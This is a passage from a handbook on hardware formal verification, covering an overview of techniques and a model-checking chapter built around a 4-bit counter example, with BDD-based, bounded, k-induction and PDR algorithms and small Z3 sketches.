property written in SystemVerilog Assertions (SVA) on any Boolean circuit written
in Verilog, SystemVerilog, or VHDL. While this generality is one of the strengths
of these model checkers, it may result in poor scalability. Specialization often
comes to the rescue in such situations. Specialization can be achieved in terms of
both the verification algorithm and the property specification. Symbolic simulation,
which is the topic of Chap. 36, "Verification of Arithmetic and Datapath Circuits with
Symbolic Simulation", is one such specialized technique, applied to the problem of
verifying arithmetic and data-path circuits. While general-purpose model checkers
can handle a much larger class of properties, symbolic simulation restricts itself to
the verification of invariants within a finite time window. In return, symbolic
simulation scales on integer and floating-point execution pipelines of real-world
processor designs, which are beyond the reach of general-purpose model checkers.
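The following minimal sketch conveys the idea behind symbolic simulation, again with Z3 (an implementation assumption of this sketch; production tools use dedicated symbolic-simulation engines). Instead of concrete test vectors, symbolic variables are driven through a tiny two-cycle datapath, and an invariant is checked within the finite two-cycle window; the datapath and the bound are invented for illustration.

from z3 import BitVec, ZeroExt, ULE, Not, Solver, unsat

def holds(claim):
    s = Solver()
    s.add(Not(claim))          # valid iff the negation is unsatisfiable
    return s.check() == unsat

# Cycle-by-cycle symbolic values of a two-stage adder (widened to 10 bits
# so that no addition overflows).
a, b, c = (ZeroExt(2, BitVec(n, 8)) for n in "abc")
stage1 = a + b                 # value registered after cycle 1
stage2 = stage1 + c            # value registered after cycle 2

# Invariant within the two-cycle window: the result never exceeds 3*255.
print(holds(ULE(stage2, 765)))   # True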
The biggest advantage of the techniques discussed so far is that they are automatic.
The user is supposed to provide the description of the system (hardware circuit)
and the properties, and the algorithm automatically detects whether the properties
are satisfied by the system. If not, the algorithm also produces a counterexample
showing the root cause of falsification. While highly automated, these techniques
suffer from scalability issues. Mechanical theorem proving sits on the other side of
the spectrum, providing less automation but more control over the convergence of the
proof process. In this interactive process, the verification obligation is discharged as
a mathematical formula and proved using standard mathematical techniques such as
induction, term rewriting, simplification, and generalization. The proof search is
done by a computer program called a theorem prover. A theorem prover attempts
to derive a proof of the verification obligation (the theorem) using the rules of
the underlying logic. However, it may not be able to derive a proof for a given
theorem, in which case the human expert needs to intervene and supply intermediate
lemmas, which might be easier targets for the theorem prover and whose proofs
might help the theorem prover derive the proof of the original theorem.
By manually structuring and decomposing the verification problem, the user can
guide the theorem prover through proofs of very complex systems. Chapter 37,
"Microprocessor Assurance and the Role of Theorem Proving" demonstrates how
a theorem prover can be used to verify both architectural and microarchitectural
properties of a microprocessor. As a case study, it demonstrates theorem-proving-based
verification of the x86 architecture.
industry that can be deployed for hardware security analysis at the register transfer
level (RTL) (Hu et al. 2021).
IFT, however, is a fundamentally different problem when compared to traditional
functional verification. While the latter maps to the verification of trace properties,
the former belongs to the verification of hyperproperties (Clarkson and Schneider
2010). Therefore, traditional static analysis techniques such as model checking, or
dynamic analysis techniques such as simulation, do not directly solve the IFT
problem. Generalized algorithms for verifying hyperproperties have been proposed
(Finkbeiner et al. 2015). However, it has been shown that the IFT problem can be
solved with the less expensive machinery of self-composition and equivalence
checking by mapping IFT to a 2-safety problem (Terauchi and Aiken 2005). On the
dynamic side, researchers have shown that simulation-based verification can be
leveraged for IFT problems by augmenting the RTL with flow-tracker logic (Hu et al.
2021). Interestingly, the same completeness and scalability trade-offs exist among
the static and dynamic techniques for IFT as well. Chapter 39, "Information Flow
Verification" discusses these techniques, their trade-offs, and the current research
trends in IFT in detail.
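A minimal sketch of the self-composition idea follows, using Z3: the (purely illustrative, deliberately leaky) design is instantiated twice with the same public input but unconstrained secrets, and noninterference is posed as the 2-safety check that the outputs cannot differ.

from z3 import BitVec, Solver, sat

def design(pub, secret):
    # Illustrative combinational design that leaks one bit of the secret.
    return pub ^ (secret & 1)

pub = BitVec('pub', 8)
s1, s2 = BitVec('s1', 8), BitVec('s2', 8)

solver = Solver()
solver.add(design(pub, s1) != design(pub, s2))   # same public input, secrets differ
if solver.check() == sat:
    print("information flows from secret to output:", solver.model())
else:
    print("noninterference holds")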
The chapters so far collectively describe the techniques that are being used in the
semiconductor industry today for its verification needs. The verification techniques
thus described are conceived and optimized for the mainstream synchronous hardware
design flow. While it is not an exaggeration to say that almost the entire semiconductor
industry revolves around synchronous hardware design today, quantum computing
is emerging as a promising alternative to classical semiconductor technology. In
tandem with the development of quantum architectures and algorithms, it is imperative
to develop verification techniques for quantum hardware as well. Chapter 40,
"Verification of Quantum Circuits" describes various algorithms that have been
developed to verify quantum hardware.
Discussion

Quantum circuits are a relatively new research paradigm; they are included in this
section for their immense practical importance. We are poised to see more progress
in this and related fields in the near future, and we intend to capture it in our
subsequent editions.
Chapter 38, "Versatile Binary-Level Concolic Testing" is the only chapter
in this section that is related to dynamic or run-time verification techniques.
The other chapters deal with static or compile-time verification techniques. Such
static techniques offer exhaustive and principled verification solutions, which are
essential for designing complex systems. It can be argued that architects need to
embrace more formal methods for tackling the design and workforce complexities
that are unavoidable in big projects. However, poor scalability and a significant
learning curve are two major impediments to a wider adoption of formal methods,
and this is where dynamic techniques such as simulation and emulation come to
the rescue. Simulation can test designs whose size is beyond the reach of formal
methods, and emulation can achieve that at hardware speed. No topic on
hardware-level simulation or emulation is included in this section, though, primarily
because there are many authoritative references already available on these topics,
which cover almost all established aspects (Wang et al. 2006). Nevertheless,
certain dynamic techniques have seen a recent surge in interest. Hardware fuzzing
is one such area, where constrained-random simulation techniques are being
revisited for hardware security assurance (Laeufer et al. 2018). We are hoping to
cover new results in such contemporary research topics in a subsequent edition of
the book.
Computer-aided verification is far from being a solved problem. As designs
are becoming more complex and time-to-market is shrinking, the gap between
what automated verification can deliver and what the semiconductor industry
needs is certainly not closing. This is why researchers are actively looking for
advanced techniques and methodologies for accelerated sign-off, shift-left for
verification deployment, and more verification coverage. While many of these
advanced techniques are still in the realm of academic research, it is worthwhile
to call out some of them as they have the potential to impact the industry in
a positive way. One such area is machine-readable specification with instruction-set
modeling. For boosting confidence in the quality of industrial designs, the
architecture community is embracing a change in how it specifies the instruction
set architecture (ISA). Traditionally, ISAs have been subjected to limited automated
analysis, if any. However, the practice is changing as researchers are showing
the benefits of capturing the ISA in a machine-readable format that can be passed
through a series of formal analyses such as type checking or model checking (Reid
2016; Huang et al. 2018; Armstrong et al. 2019). Beyond machine-readable ISA
specification, architectural modeling has gained significant momentum in the past
decade for verification of memory consistency (Trippel et al. 2017; Zhang et al.
2018) as well as micro-architectural side channels (Trippel et al. 2019; Hossain et al.
2020). While architectural models have been manually crafted by the researchers,
recent research is showing that they can be generated automatically as well (Hsiao
et al. 2021). Overall, it is a much-needed trend in research that would bring more
automation in reasoning about computer architecture.
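As a hint of what machine-readable ISA specification enables, the sketch below captures the semantics of a two-instruction toy ISA as executable functions and immediately subjects them to a formal check with Z3. The ISA is invented for illustration; real efforts use dedicated specification languages such as Sail (Armstrong et al. 2019).

from z3 import BitVec, Solver, unsat

def ADD(rs1, rs2):      # semantics: 32-bit wrap-around addition
    return rs1 + rs2

def SUB(rs1, rs2):      # semantics: 32-bit wrap-around subtraction
    return rs1 - rs2

# One analysis the model enables: SUB undoes ADD for all operands.
a, b = BitVec('a', 32), BitVec('b', 32)
s = Solver()
s.add(SUB(ADD(a, b), b) != a)
print("property proved" if s.check() == unsat else "bug in the spec")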
Conclusion
References
Armstrong A, Bauereiss T, Campbell B, Reid A, Gray KE, Norton-Wright R, Mundkur P, Wassell
M, French J, Pulte C et al (2019) ISA semantics for ARMv8-A, RISC-V, and CHERI-MIPS
Baier C, Katoen J-P (2008) Principles of model checking. MIT Press
Biere A, Cimatti A, Clarke E, Zhu Y (1999) Symbolic model checking without BDDs. In:
International conference on tools and algorithms for the construction and analysis of systems.
Springer, pp 193–207
Bradley AR (2011) SAT-based model checking without unrolling. In: International workshop on
verification, model checking, and abstract interpretation. Springer, pp 70–87
Bryant RE (1986) Graph-based algorithms for Boolean function manipulation. IEEE Trans Comput
C-35(8):677–691
Burch JR, Clarke EM, McMillan KL, Dill DL, Hwang L-J (1992) Symbolic model checking: 10^20
states and beyond. Inf Comput 98(2):142–170
Clarke EM Jr, Grumberg O, Kroening D, Peled D, Veith H (2018a) Model checking. MIT Press
Clarke EM, Henzinger TA, Veith H, Bloem R et al (2018b) Handbook of model checking, vol 10.
Springer
Clarkson MR, Schneider FB (2010) Hyperproperties. J Comput Secur 18(6):1157–1210
Cohen E (1977) Information transmission in computational systems. In: Proceedings of the sixth
ACM symposium on operating systems principles, pp 133–139
Cohen ES (1978) Information transmission in sequential programs. Found Secure Comput
297–335
Denning DE (1976) A lattice model of secure information flow. Commun ACM 19(5):236–243
Eén N, Sörensson N (2003) An extensible SAT-solver. In: International conference on theory and
applications of satisfiability testing. Springer, pp 502–518
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1204
Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1205
Explicit Example: A Simple Counter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1205
Linear Time Temporal Logic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1207
Representing Systems Symbolically . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1208
Algorithms for Safety Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1212
The Induction Principle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1212
Overview of Model Checking Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1214
Symbolic Model Checking (with BDDs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1217
Bounded Model Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1218
k-Induction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1219
Interpolation and Model Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1221
Property Directed Reachability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1225
Combining Interpolation and PDR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1228
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1229
Algorithms for Liveness Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1229
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1229
Overview of Model Checking Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1230
Symbolic Model Checking with BDDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1230
Liveness-to-Safety Conversion (L2S) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1231
Bounded Liveness Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1232
FAIR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1234
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1235
A. Ivrii
IBM, Haifa, Israel
e-mail: [email protected]

Y. Vizel
Technion - Israel Institute of Technology, Haifa, Israel
e-mail: [email protected]
Introduction
Preliminaries
Consider the hardware design that appears in Fig. 1. The Verilog code and the
corresponding circuit appear in Fig. 1a and b, respectively. The design is a simple
4-bit counter c. Initially the counter is at 0, and on every step it is either
nondeterministically reset back to 0 (if the reset signal rst is on) or increased by
1. Furthermore, the counter is always reset back to 0 upon reaching 8.
Our design can also be described by a state machine M that appears in Fig. 2.
Since the design has 4 state elements c[3:0], 4 bits are used to describe the different
states in M, resulting in a total of 2^4 = 16 states. Each single execution step of the
circuit in Fig. 1b is captured by an edge in the state machine. For instance, the state
0010 has a transition to the state 0011 corresponding to increasing the value of the
counter when rst = 0 and a transition to the state 0000 corresponding to resetting
Fig. 1 A 4-bit counter. The counter counts to 8 and resets. The counter also resets if the reset
signal rst is on (a) Verilog code. (b) Bit-level circuit
Fig. 2 A finite-state machine describing the design in Fig. 1. The state 0000 is the initial state. For
clarity, the transitions to the initial state are shown as dashed. The states 1001, 1010, 1011, 1100,
1101, 1110, and 1111 cannot be reached from the initial state
the counter when rst = 1. The initial state c = 0 of the circuit translates to the state
0000 being the only initial state of M.
The Verilog code also includes several properties that one may want to check
about the design. The first property P1 asserts that the counter never reaches the
value of 6 for any possible execution of the system. Clearly, this property does not
hold, as the counter will reach the value of 6 in exactly 6 steps if the reset is not
triggered. Equivalently, there is a "counterexample path" of length 6 in the state
machine, starting from the initial state 0000 and ending at the "bad" state 0110
violating the property:

0000 → 0001 → 0010 → 0011 → 0100 → 0101 → 0110.

The path

0000 → 0001 → 0000 → 0001 → 0010 → 0011 → 0100 → 0101 → 0110

is another counterexample, with the transition from 0001 to 0000 due to reset
occurring on the second cycle. However, one can easily check that there are no
counterexample paths of length smaller than 6; that is, the initial state 0000 cannot
reach the bad state 0110 in a sequence of 5 steps or less. The second property P2
asserts that the counter is always smaller than 10 for any possible execution of the
system. Clearly, this property holds. In fact, the set of states reachable from the
initial state is given by

{0000, 0001, 0010, 0011, 0100, 0101, 0110, 0111, 1000},

and each of these states satisfies the condition c < 10. The properties P1 and P2
are the so-called safety properties that (intuitively) say that "some bad thing never
happens."
The property P3 asserts that for any possible execution of the system, starting
from any state in the execution, the counter will always eventually reach the value
of 8. This property does not hold: consider the execution where the reset signal is
triggered on every second step; the counter will never reach the value of 3, let alone
8. However, an infinite counterexample is needed to explain the failure; no finite-
length explanation will be sufficient. In fact, every finite-length execution can be
completed to an execution where the counter does reach the value of 8. Finally, the
property P4 asserts that for any possible execution of the system, starting from the
state where c = 3, the counter must eventually reset back to 0. This property holds:
either the reset signal occurs and the counter is reset, or the reset signal does not
occur and the counter eventually reaches 8 and then becomes 0 on the next cycle.
The properties P3 and P4 are the so-called liveness properties that (intuitively) say
that "some good thing must keep happening."
Thinking in terms of states of the finite-state machine M gives a natural way
to analyze the design. For example, in order to check that the system satisfies a
given safety property, one only needs to make sure that the property holds on every
state that can be reached from the initial state. Any graph search algorithm, such
as breadth-first search or depth-first search, would provide an answer. However, a
fundamental problem with this approach is the so-called state explosion problem.
The current design has 4 state elements and requires 2^4 = 16 states to explicitly
represent the corresponding finite-state machine. In general, a design with n state
elements requires 2^n states. Unfortunately, the approach of explicitly constructing
all possible states only works for very small values of n.
in either of the forms GFp or FGq, for suitable signals p and q. See also Rozier
(2011) for a recent survey on the matter. In what follows, the considered safety/live-
ness properties will always be in one of the forms above.
To cope with the state explosion problem, modern model checking algorithms
represent states implicitly using formulas and approximate the set of reachable
states.
Transition System This section explains how it is possible to reason about states
in the design using formulas. Let V be a set of Boolean variables representing the
state elements in the design. The set S of all states can be described as S = B^|V|,
where B := {0, 1}. Given a formula F over V, one can consider F as representing the
set of states in which it is satisfiable, that is, {s ∈ S | F(s) = 1}. Conversely, a set of
states can be described by any formula that represents it. In this case, it is often said
that the set of states is described implicitly or symbolically. In particular, a single
state s ∈ S can be represented as a conjunction of literals (which are satisfied in s).
This already allows representing the initial states of the design using a formula
Init(V) and (for safety model checking) the "good" states of the design using a
formula P(V). To describe transitions between states, reasoning about pairs (s, s′)
of states is required, with s representing the starting state and s′ representing the
successor state, respectively. It is also common to refer to s as the "current state"
and to s′ as the "next state" of a transition. The set of all possible transitions can be
represented by a formula Tr(V, V′) over V and V′, called the transition relation.
The non-primed variables are usually referred to as current-state variables, and the
primed variables are referred to as next-state variables.

Example 1. Consider the state machine that appears in Fig. 2. Let us denote the set
of variables for M as V = {v0, v1, v2, v3}, where vi describes the ith bit of c. The
initial states are described by the formula

Init(V) = ¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0.

The transition relation is a bit more complex due to the many transitions between
states. A partial definition containing only the outgoing edges from 0000 and 0001
appears below:

Tr(V, V′) ⊇ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ∧ ¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ ¬v0′)
∨ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ∧ ¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ v0′)
∨ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ v0 ∧ ¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ ¬v0′)
∨ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ v0 ∧ ¬v3′ ∧ ¬v2′ ∧ v1′ ∧ ¬v0′),

where the four disjuncts correspond to the transitions 0000 → 0000 (reset),
0000 → 0001, 0001 → 0000 (reset), and 0001 → 0010, respectively.
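For readers who want to experiment, the following sketch encodes Init, Tr, and the properties of the counter with the Z3 SMT solver (an implementation choice of this sketch; the chapter's algorithms are equally well served by a CNF encoding and a SAT solver). A 4-bit bit-vector c replaces the four Boolean variables, and the free input rst covers both behaviors of the design.

from z3 import BitVec, Bool, If, ULT, Solver, sat

c, c_next = BitVec('c', 4), BitVec("c'", 4)
rst = Bool('rst')

Init = (c == 0)
Tr   = c_next == If(rst, 0, If(c == 8, 0, c + 1))
P1   = (c != 6)       # property P1: the counter never reaches 6
P2   = ULT(c, 10)     # property P2: the counter stays below 10 (unsigned)

s = Solver()
s.add(Init, Tr)
print(s.check() == sat)   # True: the encoding admits a first step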
BDDs and SAT Representing sets of states using logical formulas would not be
very useful if there was no way to represent the formulas concisely or to efficiently
reason about them. Fortunately, such ways exist, with two predominant approaches:
an approach based on binary decision diagrams (BDDs) and an approach based on
satisfiability solving (SAT).
Notation Given two formulas F and G over V, the notation F ⇒ G means that F
logically implies G (i.e., every assignment which satisfies F also satisfies G). For
instance, given the formulas in Example 1, Init ⇒ P means that the property P
holds on every initial state.
Given a formula F over V, the primed formula F′ denotes the corresponding
formula in which all variables v ∈ V have been replaced with their primed versions
v′ ∈ V′. In the context of multiple steps of the transition system, the notation V^i
denotes a fresh copy of the state variables representing the state at step i. Finally,
the post-image operator PostImg(F, Tr) := (∃V. F(V) ∧ Tr(V, V′))[V′ ↦ V]
computes the set of all states reachable in exactly one step from the states in F.
Example 3. Let us compute PostImg(Init, Tr) in our running example. It follows
that

Init(V) ∧ Tr(V, V′) = (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ∧ ¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ ¬v0′)
∨ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0 ∧ ¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ v0′),

where the first disjunct corresponds to the transition from 0000 back to 0000 and
the second disjunct corresponds to the transition from 0000 to 0001. All the other
disjuncts in Tr(V, V′) disappear as they are incompatible with Init(V) = ¬v3 ∧
¬v2 ∧ ¬v1 ∧ ¬v0. Thus,

∃V. Init(V) ∧ Tr(V, V′) ≡ (¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ ¬v0′) ∨ (¬v3′ ∧ ¬v2′ ∧ ¬v1′ ∧ v0′),

and, after renaming the primed variables to their unprimed counterparts,

PostImg(Init, Tr) ≡ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ ¬v0) ∨ (¬v3 ∧ ¬v2 ∧ ¬v1 ∧ v0).

The above formula can be written even more compactly as PostImg(Init, Tr) ≡
¬v3 ∧ ¬v2 ∧ ¬v1.
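The post-image computation of Example 3 can be reproduced mechanically with Z3's quantifier-elimination tactic, as sketched below (the use of Z3 and the variable names are assumptions of this sketch; BDD packages perform the same existential quantification natively).

from z3 import Bools, And, Or, Not, Exists, Tactic, substitute

v0, v1, v2, v3 = Bools('v0 v1 v2 v3')
w0, w1, w2, w3 = Bools("v0' v1' v2' v3'")     # primed (next-state) copies

Init = And(Not(v3), Not(v2), Not(v1), Not(v0))
# Only the two transitions leaving 0000 matter here (cf. Example 3).
Tr = Or(And(Init, Not(w3), Not(w2), Not(w1), Not(w0)),   # 0000 -> 0000
        And(Init, Not(w3), Not(w2), Not(w1), w0))        # 0000 -> 0001

img  = Tactic('qe')(Exists([v0, v1, v2, v3], And(Init, Tr))).as_expr()
post = substitute(img, (w0, v0), (w1, v1), (w2, v2), (w3, v3))
print(post)   # logically equivalent to ~v3 & ~v2 & ~v1, as in Example 3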
Model checking algorithms aim to establish the safety of a given transition system
or provide a counterexample if the system is not safe. A model checking algorithm
is complete if it is able to either provide a counterexample or prove the absence of
counterexamples of any length and sound if it does not provide a wrong answer.
Most model checking algorithms are based on some form of inductive reasoning.
Consider a transition system M = ⟨V, Init, Tr⟩ and a (safety) property P.
First, let us suppose that every initial state of M satisfies P (i.e., Init ⇒ P) and
that every state that satisfies P can only transition to another state that satisfies P
(i.e., P ∧ Tr ⇒ P′). It follows then that all the reachable states in M must satisfy P.
This type of reasoning is called the principle of induction, and the property P is said
to be inductive. Equivalently, if as a set of states P includes all of the initial states
and is closed under the transition relation, then it necessarily contains all of the
reachable states (and, in addition, it may also include some of the non-reachable
states). Checking whether P is inductive can easily be done using a SAT solver, by
checking whether both formulas Init ∧ ¬P and P ∧ Tr ∧ ¬P′ are unsatisfiable.
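These two checks are a one-liner for a SAT or SMT solver. The sketch below performs them with Z3 for the simplified counter (reset tied off, as in the running example later in this chapter) and the property P : c < 10; the bit-vector encoding is an assumption of the sketch.

from z3 import BitVec, If, ULT, Not, Solver, unsat

c, cn = BitVec('c', 4), BitVec("c'", 4)
Tr = cn == If(c == 8, 0, c + 1)
P, Pn = ULT(c, 10), ULT(cn, 10)

def unsatisfiable(*formulas):
    s = Solver()
    s.add(*formulas)
    return s.check() == unsat

print(unsatisfiable(c == 0, Not(P)))    # Init ∧ ¬P:    True (holds on initial states)
print(unsatisfiable(P, Tr, Not(Pn)))    # P ∧ Tr ∧ ¬P': False (c = 9 steps to c' = 10)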
In practice, however, the property P is usually not closed under the transition
relation (and thus is not inductive). In this case, P ∧ Tr ⇒ P′ does not hold, or
equivalently the formula P ∧ Tr ∧ ¬P′ is satisfiable. It follows that there exist states
s and t such that (s, t) ∈ Tr, s ∈ P, and t ∉ P. The state s is usually referred to as
a counterexample to induction. This does not mean that M is not safe with respect to
P; it only means that the safety of P cannot be proved by the principle of induction
alone. So, in order to show that P holds in all reachable states, model checking
algorithms use a more complex type of inductive reasoning in the form of a safe
inductive invariant:

Definition 2. A formula F over V is a safe inductive invariant w.r.t. a property P
if (1) Init ⇒ F, (2) F ∧ Tr ⇒ F′, and (3) F ⇒ P.

Lemma 1. If there exists a safe inductive invariant w.r.t. P, then every reachable
state of M satisfies P.
The above lemma leads to the perspective that the goal of a model checking
algorithm is to either synthesize a safe inductive invariant (and by that to prove that
the property holds) or to prove that such an inductive invariant does not exist (usually
by finding a counterexample). Checking whether F is a safe inductive invariant for
P can be easily done using a SAT solver, by checking whether the formulas Init ∧
¬F, F ∧ Tr ∧ ¬F′, and F ∧ ¬P are all unsatisfiable. However, finding an inductive
invariant (when it exists) is a very challenging task. Model checking algorithms
approach this task by traversing the state space and constructing an inductive trace:
Definition 3. An inductive trace of length k is a sequence of propositional formulas
F[k] = ⟨F0, . . . , Fk⟩ such that:

• F0 = Init
• Fi ∧ Tr ⇒ F′i+1 for 0 ≤ i < k

An inductive trace F[k] is monotonic if Fi ⇒ Fi+1 for 0 ≤ i < k and is safe w.r.t. a
property P if Fi ⇒ P for 0 ≤ i ≤ k. The individual propositional formulas Fi in a
trace F[k] are called frames of the trace.
In what follows, an inductive trace F[k] is referred to as a trace, and the subscript
[k] is dropped when clear from the context. In addition, if F is safe w.r.t. a property
P and when P is clear from the context, F is referred to as safe. An element Fi
in a trace F[k] represents an over-approximation of all states reachable in i steps of
the transition system. If the trace is monotonic, then Fi is an over-approximation of
all states reachable in at most i steps. Monotonic traces arise (1) in the context of
BDD-based model checking (Burch et al. 1990), where the set of reachable states
is iteratively increased until either a fixed point is reached or a counterexample is
detected, and (2) in SAT-based model checking algorithms such as ISB (Vizel and
Grumberg 2009), PDR (Bradley 2011), and AVY (Vizel and Gurfinkel 2014).
The following definition and lemma highlight the relationship between an
inductive invariant (Definition 2) and an inductive trace (Definition 3).
Definition 4. Let F[k] be a trace. Let us define F̄i := F0 ∨ · · · ∨ Fi, where 0 ≤ i < k.
If there exists 0 ≤ i < k such that Fi+1 ⇒ F̄i, then F is referred to as closed w.r.t. i.
This section provides a brief overview of the principles and mechanics underlying a
number of widely used model checking techniques for safety properties. These tech-
niques are summarized in Table 1, illustrated in Figs. 5, 6, 7, and 8, and described
in detail in sections "Symbolic Model Checking (with BDDs)" to "Combining
Interpolation and PDR". Whenever possible, the techniques are illustrated using
the transition system M = ⟨V, Init, Tr⟩ described in section "Explicit Example:
A Simple Counter", except that the reset signal rst is assumed to be always
off. This allows writing the transition relation in a slightly simplified form as
Tr := (c′ = ((c == 8) ? 0 : c + 1)). The safety property considered is P : c < 10.
Symbolic Model Checking (SMC) with BDDs Using logical formulas to traverse
the state space of a given transition system and representing them using reduced
ordered binary decision diagrams (ROBDDs, BDDs for short) (Bryant 1986) was
introduced in the seminal work of McMillan et al. (Burch et al. 1990). In fact, this
work has enabled the application of model checking algorithms to realistic circuits
with hundreds of state variables. SMC uses the post-image operator, which for a
given set of states computes all states that are reachable from that set of states in
Fig. 5 Symbolic model checking with BDDs. The set Ri represents all states that are reachable
in i steps or less from the initial states. Each Ri is obtained as the disjunction of Ri−1 and the
post-image operator applied to Ri−1. Note that R0 := Init
Fig. 6 Bounded model checking (BMC) checks whether a property P can be violated in k steps
by encoding reachable sets of states (R1, . . . , Rk) as a SAT instance (without computing the Ri's
explicitly). BMC does not identify repeatedly visited states and cannot determine whether the
property holds for arbitrarily many steps
one step of the transition relation Tr. The post-image operator is used iteratively,
starting from the initial states, in order to compute all states that are reachable from
the initial states. This process continues until either it discovers a bad state that is
reachable or it reaches a fixed point, concluding that no reachable state is a bad state.
In the former case, a counterexample is found, while, in the latter case, the property
is proved correct. The iterative application of the post-image operator is illustrated
in Figs. 4 and 5.
Bounded Model Checking (BMC) The success of BMC (Biere et al. 1999) is
based on its ability to find counterexamples. BMC is based on the exploration of
bounded paths in a transition system M. To this end, BMC unwinds the transition
relation Tr, as illustrated in Fig. 6 and explained in section "Bounded Model
Checking", in order to determine whether the property P can be violated in exactly
k steps.
k-Induction k-Induction (Sheeran et al. 2000) strengthens this principle with two
checks: (the "base case") P holds along all initial paths of length k, and (the "step
case") whenever P holds for k consecutive steps of the transition system, then it
necessarily also holds in the subsequent step. One can see that if such a k exists,
then P holds on all reachable states and that the principle of induction corresponds
to the case of k = 1. k-Induction is usually used with BMC. With the additional
unique-state constraints, k-induction is complete (Sheeran et al. 2000), namely, if a
transition system M is safe, then there exists a k for which both the base and the
step case can be proved.
Property Directed Reachability The PDR algorithm (Bradley 2011; Een et al.
2011), originally called IC3 (IC3 stands for "Incremental Construction of Inductive
Clauses for Indubitable Correctness," while PDR stands for "Property Directed
Reachability"), differs from the abovementioned algorithms in that it does not
explicitly unroll the transition relation (viz., it does not use the path_{i,j} formulas).
PDR maintains a monotonic safe trace (as illustrated in Fig. 8), which is
incrementally refined by eliminating states that can be proven unreachable by means
of consecution checks (Definition 2) over subsequent frames. PDR's focus on single
steps of the transition relation enables an efficient and targeted generation of
relatively inductive clauses. Unlike interpolation-based techniques, PDR does not
depend on the (usually unpredictable) results produced by an interpolation engine.
one by one. This limited the applicability of model checking algorithms for two
obvious reasons: it requires one to (i) construct the state graph and (ii) traverse its
states. Achieving both of these is intractable for the state graphs of realistic systems,
simply because they consist of too many states. For example, a hardware design
with a 32-bit register has 2^32 states. As a result, explicit model checking algorithms
could not be applied to realistic systems.
A decade later, in the seminal work of McMillan et al. (Burch et al. 1990), the
paradigm changed with the introduction of symbolic model checking (SMC)
using binary decision diagrams (BDDs). Unlike explicit model checking algorithms,
SMC does not require constructing the state graph and does not explicitly traverse
the states of the system one by one. Instead, it uses logical formulas to represent
the system and various sets of states. These logical formulas are represented using a
data structure called BDDs (Bryant 1986). (The interested reader can find all details
about BDDs and their use in this context in Clarke et al. 2001.) This new paradigm
made it possible to apply model checking to systems that are orders of magnitude
larger than what was possible with explicit model checking.
BDD-based symbolic model checking is an iterative process for checking P on
all states reachable from Init in M. At each iteration i, SMC computes the set Ri
of states that are reachable in i steps or less from the initial states and checks if
all the states in Ri satisfy P. The computation uses the post-image operator (see
section "Representing Systems Symbolically" and Figs. 4 and 5). Specifically, the
Ri's are defined in the following manner:

R0 := Init,   Ri := Ri−1 ∨ PostImg(Ri−1, Tr) for i > 0.

For each such set Ri of reachable states, SMC checks whether Ri ⇒ P, that is,
whether all the states that are reachable in i steps or less satisfy the property P. If this
implication does not hold, then there exists a state that is reachable in at most i steps
that violates P. Hence, SMC concludes that a counterexample is found.
If the implication does hold, SMC checks if a fixed point is reached. Note that
from the definition of Ri, it holds that Ri−1 ⇒ Ri. Therefore, a fixed point is
reached when Ri ⇒ Ri−1. In case a fixed point is found, SMC concludes that all
reachable states satisfy P and hence the property holds. Otherwise, it moves to the
next iteration. Note that F := ⟨R0, R1, . . . , Rk⟩ is a trace as per Definition 3.
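The iteration is easy to mimic with explicit sets of states, as the sketch below does for the counter of Fig. 1 (reset kept as a free input). The logic is exactly SMC's; a BDD package merely represents the sets Ri symbolically instead of enumerating them.

def post(states):
    succs = set()
    for c in states:
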